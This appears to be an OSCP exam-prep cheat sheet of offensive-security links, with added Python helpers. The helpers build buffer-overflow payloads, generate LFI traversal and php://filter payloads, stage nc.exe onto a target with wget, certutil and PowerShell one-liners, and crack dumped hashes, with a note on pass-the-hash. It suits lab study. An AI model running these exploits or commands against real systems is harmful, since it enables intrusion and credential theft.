Backdoors/Web Shells
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://highon.coffee/blog/reverse-shell-cheat-sheet/
- http://pentestmonkey.net/tools/web-shells/php-reverse-shell
- http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
- https://github.com/bartblaze/PHP-backdoors
- https://github.com/BlackArch/webshells
- https://github.com/tennc/webshell/tree/master/php/b374k
- https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell
- http://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
- http://securityweekly.com/2011/10/23/python-one-line-shell-code/
Buffer Overflows
- http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/
- http://proactivedefender.blogspot.ca/2013/05/understanding-buffer-overflows.html
- http://justpentest.blogspot.ca/2015/07/minishare1.4.1-bufferoverflow.html
- https://samsclass.info/127/proj/vuln-server.htm
- http://www.bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
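A helper for the vanilla EIP-overwrite workflow the links above walk through: cyclic pattern in, crashed EIP out, offset recovered, bad-character probe, final buffer. This is an added example written for these notes, not code from any of the linked tutorials; the EIP value, return address and host/port used in the demo run are made up.

```python
"""Stack-overflow helpers: pattern -> crash -> offset -> bad chars -> buffer.
Added example for this cheat sheet; not from the linked tutorials."""
import socket
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). It does not repeat within
    its first 20280 bytes, so the 4 bytes that land in EIP identify one offset."""
    out = bytearray()
    for u, l, d in product(ascii_uppercase, ascii_lowercase, digits):
        out += (u + l + d).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """EIP as read from the debugger (e.g. 0x37614136) -> offset into the pattern.
    x86 is little-endian, so the register holds the 4 stack bytes reversed.
    Returns -1 when the value is not from the pattern (EIP not controlled)."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def badchar_probe(exclude=(0x00,)) -> bytes:
    """Every byte value except those already known bad (\\x00 by default). Send it
    after the EIP overwrite, compare the stack dump with mona or by eye; the first
    byte missing or mangled is the next bad char to add to `exclude`."""
    bad = set(exclude)
    return bytes(b for b in range(256) if b not in bad)


def build_buffer(offset: int, ret_addr: int, shellcode: bytes,
                 nop_sled: int = 16, total: Optional[int] = None) -> bytes:
    """Filler up to the saved EIP, little-endian return address (e.g. a JMP ESP
    found with mona), a short NOP sled, then shellcode. `total` pads the buffer
    to the length that crashed the service so the stack layout stays the same."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    if total is not None:
        if len(buf) > total:
            raise ValueError("payload does not fit in the overflow")
        buf += b"C" * (total - len(buf))
    return buf


def send_buffer(host: str, port: int, data: bytes, prefix: bytes = b"",
                timeout: float = 5.0) -> None:
    """Deliver one buffer to the service; prefix is the protocol verb (b'USER ' etc.)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(prefix + data + b"\r\n")


if __name__ == "__main__":
    # Constructed run: the debugger showed EIP = 0x37614136 after a 2000-byte pattern
    # and \x00 is the only bad char found so far. 0xDEADBEEF stands in for a real JMP ESP.
    off = pattern_offset(0x37614136)
    print("EIP offset:", off)
    print("bad-char probe bytes:", len(badchar_probe()))
    buf = build_buffer(off, 0xDEADBEEF, b"\xcc" * 4, total=64)
    print(len(buf), buf[:off + 4])
    # send_buffer("10.11.1.10", 9999, buf, prefix=b"TRUN /.:/")  # hypothetical target
```

Re-run `badchar_probe` with a growing `exclude` set until the dump matches byte for byte; only then pick a return address whose bytes avoid that set.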
Information Gathering/Reconnaissance
Cross-Compilation
Local File Inclusion/Remote File Inclusion (LFI/RFI)
- http://www.grobinson.me/single-line-php-script-to-gain-shell/
- https://webshell.co/
- https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
- https://osandamalith.com/2015/03/29/lfi-freak/
- https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29
- https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
- https://attackerkb.com/Windows/blind_files
- https://digi.ninja/blog/when_all_you_can_do_is_read.php
- https://updatedlinux.wordpress.com/2011/05/12/list-of-important-files-and-directories-in-linux-redhatcentosfedora/
- https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI_InterestingFiles-NullByteAdded.txt
- http://www.r00tsec.com/2014/04/useful-list-file-for-local-file.html
- https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/
- https://github.com/tennc/fuzzdb/blob/master/dict/BURP-PayLoad/LFI/LFI-FD-check.txt
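A worked helper for the LFI techniques linked above (php://filter source disclosure, traversal encodings, the %00 terminator), added for these notes and not taken from the linked posts. The URL, parameter name and server response in the demo are constructed.

```python
"""LFI helpers: php://filter disclosure, traversal variants, response decoding.
Added example for this cheat sheet; target URL/parameter are assumptions."""
import base64
import re

# Files worth reading first once an include is confirmed (Linux targets).
INTERESTING = ["/etc/passwd", "/etc/issue", "/proc/self/environ",
               "/var/log/apache2/access.log", "/var/www/html/index.php"]


def php_filter(resource: str) -> str:
    """Base64-encode the included file instead of executing it, so PHP source
    (config files with DB credentials) comes back intact."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def _pct(s: str, chars: str = "./") -> str:
    """Percent-encode only the traversal characters."""
    return "".join("%%%02x" % ord(c) if c in chars else c for c in s)


def traversal_variants(path: str, depth: int = 6) -> list:
    """Variants for one target path: plain, URL-encoded, double-encoded (for apps
    that decode twice) and %00-terminated, which drops an appended extension
    such as '.php' on PHP < 5.3.4 (and with magic_quotes off)."""
    plain = "../" * depth + path.lstrip("/")
    encoded = _pct(plain)
    return [plain, encoded, encoded.replace("%", "%25"), plain + "%00"]


def decode_filter_response(body: str, min_len: int = 16) -> str:
    """Pull the longest base64 run out of an HTML response and decode it.
    Returns '' when nothing plausible is there (include failed or was filtered)."""
    runs = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, body)
    if not runs:
        return ""
    try:
        return base64.b64decode(max(runs, key=len), validate=True).decode("utf-8", "replace")
    except ValueError:
        return ""


def build_url(base: str, param: str, payload: str) -> str:
    """Assemble the request; base and param are hypothetical."""
    return f"{base}?{param}={payload}"


# Constructed response standing in for what a vulnerable page would return.
SAMPLE_RESPONSE = ("<html><body>"
                   + base64.b64encode(b"<?php $db_pass='s3cret'; ?>").decode()
                   + "</body></html>")


if __name__ == "__main__":
    print(build_url("http://10.11.1.5/index.php", "page", php_filter("config.php")))
    print(decode_filter_response(SAMPLE_RESPONSE))
    for v in traversal_variants("/etc/passwd", 3):
        print(v)
```

Start with `php_filter` on the including script itself: its source shows how the parameter is used (prefix, appended extension) and tells you which traversal variant, if any, you need.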
File Transfer
- https://insekurity.wordpress.com/2012/05/15/file-transfer/
- https://www.cheatography.com/fred/cheat-sheets/file-transfers/
- https://blog.ropnop.com/transferring-files-from-kali-to-windows/
- https://linux.die.net/man/1/scp
- https://www.freebsd.org/cgi/man.cgi?fetch(1)
- https://curl.haxx.se/docs/manpage.html
- https://linux.die.net/man/1/wget
- Tools to know: scp, wget, ftp, tftp, curl, nc, fetch
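An end-to-end transfer check, added here as an example (not from the linked posts): stage a file over HTTP the way `python3 -m http.server` does, pull it with a binary-mode download, and compare SHA-256 on both ends, since a payload corrupted in transit (FTP in ASCII mode, a truncated download) is a common reason a freshly uploaded binary "does nothing". The server binds 127.0.0.1 so the demo runs offline; the IP, port and filename in the target one-liners are placeholders.

```python
"""Stage a file over HTTP, fetch it, verify the hash on both ends.
Added example for this cheat sheet; bound to localhost so it runs offline."""
import hashlib
import os
import shutil
import tempfile
import threading
import urllib.request
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def serve_directory(directory: str, bind: str = "127.0.0.1", port: int = 0):
    """Attacker side, same as `python3 -m http.server`. Port 0 picks a free port;
    returns (server, actual_port). Call server.shutdown() when done."""
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    srv = ThreadingHTTPServer((bind, port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(url: str, dest: str, timeout: float = 10.0) -> str:
    """Target side: download in binary mode, return the file's SHA-256."""
    with urllib.request.urlopen(url, timeout=timeout) as resp, open(dest, "wb") as out:
        shutil.copyfileobj(resp, out)
    return sha256_file(dest)


def target_one_liners(ip: str, port: int, name: str) -> dict:
    """What to type on the target once the server is up (Linux and Windows)."""
    url = f"http://{ip}:{port}/{name}"
    return {
        "wget": f"wget {url} -O {name}",
        "curl": f"curl -o {name} {url}",
        "certutil": f"certutil -urlcache -split -f {url} {name}",
        "powershell": f"powershell -c \"(New-Object Net.WebClient).DownloadFile('{url}','{name}')\"",
    }


def transfer_and_verify(payload: bytes, name: str = "tool.bin") -> bool:
    """Stage `payload`, download it through the local server, compare hashes."""
    src_dir, dst_dir = tempfile.mkdtemp(), tempfile.mkdtemp()
    try:
        src = os.path.join(src_dir, name)
        with open(src, "wb") as f:
            f.write(payload)
        srv, port = serve_directory(src_dir)
        try:
            got = fetch(f"http://127.0.0.1:{port}/{name}", os.path.join(dst_dir, name))
        finally:
            srv.shutdown()
            srv.server_close()
        return got == sha256_file(src)
    finally:
        shutil.rmtree(src_dir, ignore_errors=True)
        shutil.rmtree(dst_dir, ignore_errors=True)


if __name__ == "__main__":
    # Constructed payload with CR/LF and NUL bytes, the ones ASCII-mode transfers rewrite.
    print("hashes match:", transfer_and_verify(b"\x7fELF\r\n\x00" * 1000))
    for tool, cmd in target_one_liners("10.11.0.4", 8000, "nc.exe").items():
        print(f"{tool:10} {cmd}")
```

On a real target, run `sha256sum`/`certutil -hashfile file SHA256` after the download and compare with the hash printed on the attacker side before executing anything.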
Fuzzing Payloads
General Notes
- https://bitvijays.github.io/LFC-VulnerableMachines.html
- http://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
- https://www.darkoperator.com/powershellbasics
- https://wooly6bear.files.wordpress.com/2016/01/bwapp-tutorial.pdf
- http://alexflor.es/security-blog/post/egress-ports/
- https://www.exploit-db.com/papers/13017/
- https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
- http://explainshell.com/
- https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/
- https://github.com/g0tmi1k/mpc
- https://www.reddit.com/r/netsecstudents/comments/5fwc1z/failed_the_oscp_any_tips_for_the_next_attempt/danovo5/
- https://security.stackexchange.com/questions/110673/how-to-find-windows-version-from-the-file-on-a-remote-system
- https://www.veil-framework.com/veil-tutorial/ (AV Evasion)
- https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
- Ignore SSL certificate validation in Python scripts: http://stackoverflow.com/questions/19268548/python-ignore-certicate-validation-urllib2
Jailed Shell Escape
- http://netsec.ws/?p=337
- https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
- https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells
- http://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html
- http://securebean.blogspot.ca/2014/05/escaping-restricted-shell_3.html
Linux Post-Exploitation
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- https://github.com/huntergregal/mimipenguin
Linux Privilege Escalation
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://www.kernel-exploits.com/
- https://github.com/rebootuser/LinEnum
- https://github.com/PenturaLabs/Linux_Exploit_Suggester
- https://www.securitysift.com/download/linuxprivchecker.py
- http://pentestmonkey.net/tools/audit/unix-privesc-check
- https://github.com/mzet-/linux-exploit-suggester
- http://www.darknet.org.uk/2015/06/unix-privesc-check-unixlinux-user-privilege-escalation-scanner/
- https://www.youtube.com/watch?v=dk2wsyFiosg
- http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
- https://www.rebootuser.com/?p=1758
Metasploit
- https://www.offensive-security.com/metasploit-unleashed/
- http://www.securitytube.net/groups?operation=view&groupId=8
MSFVenom Payloads
- http://netsec.ws/?p=331
- https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- http://www.blackhillsinfosec.com/?p=4935
Port Scanning
- https://highon.coffee/blog/nmap-cheat-sheet/
- https://nmap.org/nsedoc/
- https://github.com/superkojiman/onetwopunch
- http://kalilinuxtutorials.com/unicornscan/
Password Cracking
- https://uwnthesis.wordpress.com/2013/08/07/kali-how-to-crack-passwords-using-hashcat/
- https://hashkiller.co.uk/
- https://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux
- http://www.rarpasswordcracker.com/
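Identifying and cracking unsalted hashes pulled during post-exploitation, with the matching john/hashcat invocations; an added example for these notes, not code from the linked pages. The pwdump line, hashes and wordlist in the demo are constructed (the hashes are of the string "password").

```python
"""Hash identification, wordlist cracking with cheap rules, tool command lines.
Added example for this cheat sheet; sample hashes and wordlist are constructed."""
import hashlib
import re
from typing import Dict, List, Optional

# hex length -> candidate algorithms. Deliberately ambiguous: 32 hex chars is
# MD5 or NTLM, so always confirm against a known plaintext or the source.
BY_LENGTH = {32: ["md5", "ntlm"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

# john --format / hashcat -m for the same families
TOOL_MODES = {"md5": ("raw-md5", 0), "ntlm": ("nt", 1000), "sha1": ("raw-sha1", 100),
              "sha256": ("raw-sha256", 1400), "sha512": ("raw-sha512", 1700)}


def identify(h: str) -> List[str]:
    h = h.strip()
    if not re.fullmatch(r"[0-9a-fA-F]+", h):
        return []          # $1$/$6$ crypt, bcrypt etc.: let john's own detection handle them
    return BY_LENGTH.get(len(h), [])


def parse_pwdump(lines) -> Dict[str, str]:
    """user:rid:LMhash:NThash::: (secretsdump/mimikatz output) -> {user: NT hash}."""
    out = {}
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            out[parts[0]] = parts[3].lower()
    return out


def ntlm(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). MD4 needs OpenSSL legacy support; fail
    loudly rather than return a wrong value."""
    try:
        return hashlib.new("md4", password.encode("utf-16le")).hexdigest()
    except ValueError as e:
        raise RuntimeError("MD4 unavailable in this OpenSSL build") from e


def digest(algo: str, password: str) -> str:
    return ntlm(password) if algo == "ntlm" else hashlib.new(algo, password.encode()).hexdigest()


def mangle(word: str) -> List[str]:
    """Cheap rules in the spirit of john's defaults: case, digits, punctuation."""
    cap = word.capitalize()
    return [word, cap, word + "1", word + "123", cap + "123", word + "!", cap + "!"]


def crack(h: str, wordlist, rules: bool = True) -> Optional[str]:
    """Try each candidate against every algorithm the length allows."""
    h = h.strip().lower()
    algos = identify(h)
    for word in wordlist:
        for cand in (mangle(word) if rules else [word]):
            for algo in algos:
                try:
                    if digest(algo, cand) == h:
                        return cand
                except RuntimeError:
                    continue        # no MD4: skip NTLM, keep trying the others
    return None


def tool_commands(h: str, wordlist_path: str, hashfile: str = "hashes.txt") -> List[str]:
    """Offline cracking commands for the real wordlist (rockyou etc.)."""
    cmds = []
    for algo in identify(h):
        fmt, mode = TOOL_MODES[algo]
        cmds.append(f"john --format={fmt} --wordlist={wordlist_path} {hashfile}")
        cmds.append(f"hashcat -m {mode} -a 0 {hashfile} {wordlist_path}")
    return cmds


WORDLIST = ["letmein", "summer", "password", "admin"]   # constructed

if __name__ == "__main__":
    md5_pw = "5f4dcc3b5aa765d61d8327deb882cf99"         # md5("password")
    print(identify(md5_pw), crack(md5_pw, WORDLIST))
    print(parse_pwdump(["guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"]))
    for c in tool_commands(md5_pw, "/usr/share/wordlists/rockyou.txt"):
        print(c)
```

Use this only to triage; for anything beyond a few hundred candidates hand the file to john or hashcat with the printed format/mode, and remember that NT hashes from a dump can often be used directly (pass-the-hash) without cracking.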
Pivoting
- https://www.offensive-security.com/metasploit-unleashed/portfwd/
- https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- https://github.com/rofl0r/proxychains-ng
- https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117
- https://pentest.blog/explore-hidden-networks-with-double-pivoting/
- https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/
- https://www.cobaltstrike.com/help-socks-proxy-pivoting
- https://sathisharthars.com/2014/07/07/evade-windows-firewall-by-ssh-tunneling-using-metasploit/
- https://artkond.com/2017/03/23/pivoting-guide/
Remote Desktop Protocol (RDP)
- https://serverfault.com/questions/148731/enabling-remote-desktop-with-command-prompt
- https://serverfault.com/questions/200417/ideal-settings-for-rdesktop
Samba (SMB)
- https://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
- http://www.blackhillsinfosec.com/?p=4645
TTY Shell Spawning
- http://netsec.ws/?p=337
- https://github.com/infodox/python-pty-shells
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
SQL Injection
- http://www.sqlinjection.net/category/attacks/
- http://sechow.com/bricks/docs/login-1.html
- https://www.exploit-db.com/papers/12975/
- https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
- https://github.com/cr0hn/nosqlinjection_wordlists
- https://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
- https://websec.ca/kb/sql_injection#MSSQL_Default_Databases
Vulnhub VMs
A few Vulnhub VMs. I recommend trying out a few before the exam or when your lab time expires.
Another piece of good advice is to read or watch the walkthroughs of those machines, but try to root them yourself first!
- Kioptrix: Level 1 (#1)
- Kioptrix: Level 1.1 (#2)
- Kioptrix: Level 1.2 (#3)
- Kioptrix: Level 1.3 (#4)
- FristiLeaks: 1.3
- Stapler: 1
- PwnLab: init
- Tr0ll: 1
- Tr0ll: 2
- Kioptrix: 2014
- Lord Of The Root: 1.0.1
- Mr-Robot: 1
- HackLAB: Vulnix
- VulnOS: 2
- SickOs: 1.2
- pWnOS: 2.0
HackTheBox (HTB)
HTB is a penetration testing platform with many machines that feel like they belong in the OSCP labs. You have to pass the registration challenge first; only then is VPN access provided. I suggest doing a few, as it is free and an excellent way to prepare for the exam without downloading a vulnerable VM.
Web Exploitation
- http://www.studfiles.ru/preview/2083097/page:7/
- http://126kr.com/article/3vbt0k8fxwh
- http://meyerweb.com/eric/tools/dencoder/
Windows Post-Exploitation
- https://github.com/gentilkiwi/mimikatz/releases/
- https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa
- http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
- https://github.com/PowerShellMafia/PowerSploit
- https://github.com/mubix/post-exploitation/wiki/windows
Windows Privilege Escalation
- http://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://github.com/pentestmonkey/windows-privesc-check
- https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- https://github.com/foxglovesec/RottenPotato
- http://www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet/
- https://www.youtube.com/watch?v=PC_iMqiuIRQ
- https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be
- https://github.com/PowerShellMafia/PowerSploit
- http://www.blackhillsinfosec.com/?p=5824
- https://www.commonexploits.com/unquoted-service-paths/
- https://github.com/abatchy17/WindowsExploits